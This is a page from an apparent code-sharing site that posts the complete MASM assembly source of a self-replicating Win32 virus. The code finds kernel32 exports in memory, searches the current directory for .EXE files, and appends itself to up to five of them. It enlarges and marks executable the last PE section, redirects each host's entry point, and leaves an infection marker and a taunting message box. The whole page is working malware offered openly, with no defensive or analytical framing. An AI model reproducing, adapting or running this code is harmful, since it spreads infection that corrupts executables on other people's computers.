Win32 Virus - Assembly Code Bank
Win32 Virus
My little Win32 virus, which infects .exe files in a directory
Compiler: MASM
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
VirusSize equ (offset VirusEnd - offset VirusStart)
.data
OurTitle db "Message",0
OurMessage db "This Is [Win32] Virus",10
db " by EdoVt",0
.code
VirusStart label byte
start:
nop
nop
pushad
pushfd
call delta
delta:
pop ebp
sub ebp,offset delta;; ebp=delta offset
mov eax,[esp+24h];;eax==somewhere in Kernel32( CreateProcess)
call FuckTheK32
call GetAPIz
call Infect
or ebp,ebp
jz @1stGen;;;;;;First Generetion
;;WE Can Fuck This File
;;;Call Of LoadLibrary API
lea eax,[USER32DLL+ebp]
push eax
call [ebp+_LoadLibraryA]
;;;End Call eax==user32.dll handle
;;;Call of GetProcAddress
lea ecx,[MESSAGEBOX+ebp]
push ecx
push eax
call [ebp+_GetProcAddress]
;;;;End Call Eax==MessageBoxA Address
;;;MessageBoxA Call
xor ebx,ebx
push ebx
lea ecx,[MesTitle+ebp]
push ecx
lea ecx,[Mess+ebp]
push ecx
push ebx
call eax
popfd
popad
mov eax,12345678h
org $-4
ImageBase dd 400000h
add eax,12345678h
org $-4
EntryPoint dd 1000h
jmp eax
;;return to the host
push 0
call ExitProcess
Infect:
and [ebp+Infections],00000000h
lea eax,[@WinFindData+ebp]
push eax
lea eax,[SearchMask+ebp]
push eax
call [ebp+_FindFirstFileA]
inc eax
or eax,eax
jz FailInfect
dec eax
mov [ebp+SearchHandle],eax
InfectIt:
push [ebp+EntryPoint]
push [ebp+ImageBase]
call Infection
pop [ebp+ImageBase]
pop [ebp+EntryPoint]
inc [ebp+Infections]
cmp [ebp+Infections],5
jz CloseSearchHandle
;;;;;;;;Its All Right
nop
lea edi,[@WinFindData.cFileName+ebp]
mov ecx,MAX_PATH
xor al,al
rep stosb
lea eax,[ebp+@WinFindData]
push eax
push dword ptr [ebp+SearchHandle]
call [ebp+_FindNextFileA]
or eax,eax
jnz InfectIt
CloseSearchHandle:
push [ebp+SearchHandle]
call [ebp+_FindClose]
FailInfect:
ret
Infection:
lea esi,dword ptr[ebp+@WinFindData.cFileName]
push 80h
push esi
call [ebp+_SetFileAttributesA]
call @OpenFile
inc eax
or eax,eax
jz CantOpen
dec eax;;eax==Current File handle
mov [ebp+FileHandle],eax
xor ecx,ecx
call CreateMap
or eax,eax
jz CloseFile
mov [ebp+MapHandle],eax
mov ecx,[ebp+@WinFindData.nFileSizeLow]
call MapFile
or eax,eax
jz CloseMap
mov [ebp+MapAddress],eax
mov esi,[eax+3ch]
add esi,eax;;;;;PE header in esi
mov eax,esi
cmp word ptr[eax],'EP'
jnz NoInfect
;;;Yeah its PE file
cmp dword ptr [eax-04h],'nooM';;;Is File Infected
jz NoInfect
push dword ptr [eax+3ch]
push dword ptr [ebp+MapAddress]
call [ebp+_UnmapViewOfFile]
push dword ptr [ebp+MapHandle]
call [ebp+_CloseHandle]
pop ecx;;;File ALign
mov eax,[ebp+@WinFindData.nFileSizeLow]
add eax,VirusSize
call @@Align
mov [ebp+NewSize],eax
xchg ecx,eax
call CreateMap
or eax,eax
jz CloseFile
mov [ebp+MapHandle],eax
mov ecx,[ebp+NewSize]
call MapFile
or eax,eax
jz CloseMap
mov [ebp+MapAddress],eax
mov esi,[eax+3ch]
add esi,eax;;;;;PE header in esi
mov edi,esi
add esi,78h;;Pointer to Directory table
mov edx,[edi+74h];;Number of directories
shl edx,3
add esi,edx;;Pointer to 1st section
movzx eax,word ptr [edi+06h]
dec eax
imul eax,eax,28h
add esi,eax;;;;esi =====pointer to last the section
mov eax,dword ptr[edi+28h];;;EntryPoint in eax
mov dword ptr[ebp+EntryPoint],eax
mov eax,dword ptr[edi+34h]
mov dword ptr[ebp+ImageBase],eax
mov edx,dword ptr[esi+10h];;Sizeofrawdata
mov ebx,edx
add edx,dword ptr[esi+14h];;edx=edx+Pointer to raw data
push edx
mov eax,dword ptr[esi+0ch];;eax===last section RVA
add eax,ebx;;;;NewEIP
mov dword ptr [ebp+OurEntryPoint],eax;;;New ENtryPoint
mov dword ptr[edi+28h],eax;;Set New EntryPoint
mov eax,dword ptr[esi+10h];;Size of raw data
add eax,VirusSize
push eax
mov ecx,[edi+3ch]
call @@Align
mov dword ptr[esi+10h],eax;;;New Size of raw data
mov ecx,[edi+038h]
pop eax
call @@Align
shl eax,1
mov dword ptr[esi+08h],eax;;New Virtual Size
pop edx;;;;edx=SizeOfRawData+Pointer to raw data
add eax,dword ptr[esi+0Ch];;eax=eax+RVA(Last Section)
mov dword ptr[edi+50h],eax;;;New SizeOfImage
or dword ptr [esi+24h],0A0000020h;;;New attributes for last section
mov dword ptr [edi-04h],"nooM";;Our LOGO
lea esi,[ebp+start]
mov edi,edx
add edi,[ebp+MapAddress];;;edi=Pointer to place where go our virus
mov ecx,VirusSize
rep movsb
push dword ptr [ebp+MapAddress]
call [ebp+_UnmapViewOfFile]
jmp CloseMap
NoInfect:
dec word ptr [ebp+Infections]
CloseMap:
push dword ptr [ebp+MapHandle]
call [ebp+_CloseHandle]
CloseFile:
push dword ptr [ebp+FileHandle]
call [ebp+_CloseHandle]
CantOpen:
push dword ptr [ebp+@WinFindData.dwFileAttributes]
lea eax,[ebp+@WinFindData.cFileName]
push eax
call [ebp+_SetFileAttributesA]
ret
@@Align proc
xor edx,edx
push eax
div ecx
pop eax
or edx,edx
jz Enough
sub ecx,edx
add eax,ecx
Enough: ret
@@Align endp
MapFile proc
xor eax,eax
push ecx
push eax
push eax
push 02h
push [ebp+MapHandle]
call [ebp+_MapViewOfFile]
ret
MapFile endp
CreateMap proc
xor eax,eax
push eax
push ecx
push eax
push 04h
push eax
push [ebp+FileHandle]
call [ebp+_CreateFileMappingA]
ret
CreateMap endp
@OpenFile proc;;esi=pointer to the file name
xor eax,eax
push eax
push eax
push 03h
push eax
push 01h
push 80000000h or 40000000h
push esi
call [ebp+_CreateFileA]
ret
@OpenFile endp
FuckTheK32 proc;;eax==somewhere in Kernel32( CreateProcess)
@loop:
cmp word ptr [eax],"ZM";;Is It MZ header
jz WeGotK32MZ
dec eax;
jmp @loop;;loop
WeGotK32MZ:
mov [Kernel_MZ+ebp],eax
add eax,3ch;;[eax] === PE header offset
mov eax,[eax];;eax===PE header offset
add eax,[ebp+Kernel_MZ];;;Normalize
cmp word ptr [eax],"EP"
jz WeGotK32
;;;Call of ExitProcess
push 0
call ExitProcess
WeGotK32:
cld
mov [Kernel_PE+ebp],eax
mov esi,eax;;esi=Kernel_PE
add esi,78h
lodsd;;;; eax=RVA of Export Table
add eax,[Kernel_MZ+ebp];;;Normalize
mov esi,eax
add esi,1ch
lodsd;;;eax==RVA of Export Address table
add eax,[Kernel_MZ+ebp];;Normalize that
mov [ExpAddrTableVA+ebp],eax;;Keeping
lodsd;;eax==RVA of Export Names pointer table
add eax,[Kernel_MZ+ebp];;Normalizing
mov [ExpNameTableVA+ebp],eax
lodsd
add eax,[Kernel_MZ+ebp]
mov [ExpOrdinalTableVA+ebp],eax
ret
FuckTheK32 endp
;;;;;;;;;;;;;;;;;Function to Get the APIs Addressis
GetAPIz proc
cld
lea ebx,[OurAPIz+ebp]
lea edi,[OurFuncz+ebp]
begin:
push edi
mov [Counter+ebp],0
xor ecx,ecx
mov esi,ebx
@_1: lodsb
inc ecx
or al,al
jnz @_1
mov edx,ecx
mov edi,ebx
mov esi,[ExpNameTableVA+ebp]
push esi
@_2:lodsd
mov esi,eax
add esi,[Kernel_MZ+ebp]
repe cmpsb
jz TheyAreEqual
pop esi
add esi,4
push esi
mov edi,ebx
mov ecx,edx
inc word ptr [Counter+ebp]
jmp @_2
TheyAreEqual:
pop esi
pop edi
xor esi,esi
add ebx,edx
xor eax,eax
mov si,[Counter+ebp]
shl esi,1
add esi,[ExpOrdinalTableVA+ebp]
lodsw
mov esi,eax
shl esi,2
add esi,[ExpAddrTableVA+ebp]
lodsd
add eax,[Kernel_MZ+ebp]
stosd
cmp dword ptr [ebx],"jreV"
jnz begin
ret
GetAPIz endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Functions End
Infections db 0
OurEntryPoint dd 1000h
Counter dw 0
USER32DLL db "user32.dll",0
MESSAGEBOX db "MessageBoxA",0
MesTitle db "Got Ya !!!!!!!!!!!!!",0
Mess db "Everything under the sun is in tune,",10
db "But the sun is eclipsed by the MOON.",10
db " Pink Floyd",10,10
db "This File Is Infected By ",0
SearchMask db '*.EXE',0
OurAPIz label byte
@FindFirstFileA db "FindFirstFileA",0
@FindNextFileA db "FindNextFileA",0
@FindClose db "FindClose",0
@CloseHandle db "CloseHandle",0
@CreateFileA db "CreateFileA",0
@SetFilePointer db "SetFilePointer",0
@SetFileAttributesA db "SetFileAttributesA",0
@CreateFileMappingA db "CreateFileMappingA",0
@MapViewOfFile db "MapViewOfFile",0
@UnmapViewOfFile db "UnmapViewOfFile",0
@SetEndOfFile db "SetEndOfFile",0
@LoadLibraryA db "LoadLibraryA",0
@GetProcAddress db "GetProcAddress",0
db "Verj",0
VirusEnd label byte
OurFuncz label byte
_FindFirstFileA dd 0
_FindNextFileA dd 0
_FindClose dd 0
_CloseHandle dd 0
_CreateFileA dd 0
_SetFilePointer dd 0
_SetFileAttributesA dd 0
_CreateFileMappingA dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_SetEndOfFile dd 0
_LoadLibraryA dd 0
_GetProcAddress dd 0
@WinFindData WIN32_FIND_DATA <>
SearchHandle dd ?
FileHandle dd ?
MapHandle dd ?
MapAddress dd ?
NewSize dd ?
OurDelta dd ?
HostStart dd ?
Kernel_MZ dd ?
Kernel_PE dd ?
ExpAddrTableVA dd ?
ExpNameTableVA dd ?
ExpOrdinalTableVA dd ?
@1stGen:
popfd
popad
xor eax,eax
push eax
push offset OurTitle
push offset OurMessage
push eax
call MessageBoxA
push 0
call ExitProcess
end start